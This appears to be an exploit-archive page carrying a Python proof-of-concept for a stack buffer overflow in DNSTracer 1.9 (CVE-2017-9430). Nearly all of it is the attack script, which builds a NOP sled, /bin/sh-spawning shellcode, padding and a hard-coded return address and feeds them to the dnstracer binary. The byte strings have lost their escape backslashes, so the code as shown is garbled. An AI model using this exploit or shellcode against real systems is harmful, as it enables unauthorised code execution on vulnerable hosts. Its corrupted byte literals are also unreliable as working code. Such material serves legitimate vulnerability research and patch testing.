Home / os / winmobile

DNSTracer 1.9 Buffer Overflow

Posted on 04 August 2017

# Exploit Title: DNSTracer 1.9 - Buffer Overflow # Google Dork: [if applicable] # Date: 03-08-2017 # Exploit Author: j0lama # Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php # Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz # Version: 1.9 # Tested on: Ubuntu 12.04 # CVE : CVE-2017-9430 # Bug report: https://www.exploit-db.com/exploits/42115/ # Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php # Proof of Concept import os from subprocess import call def run(): try: print " DNSTracer Stack-based Buffer Overflow" print "Author: j0lama" print "Tested with Dnstracer compile without buffer overflow protection" nops = "x90"*1006 shellcode = "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80" filling = "A"*24 eip = "x2fxebxffxbf" #buf size = 1057 buf = nops + shellcode + filling + eip call(["./dnstracer", buf]) except OSError as e: if e.errno == os.errno.ENOENT: print " Dnstracer not found! " else: print " Error executing exploit " raise if __name__ == '__main__': try: run() except Exception as e: print "Something went wrong"

 

TOP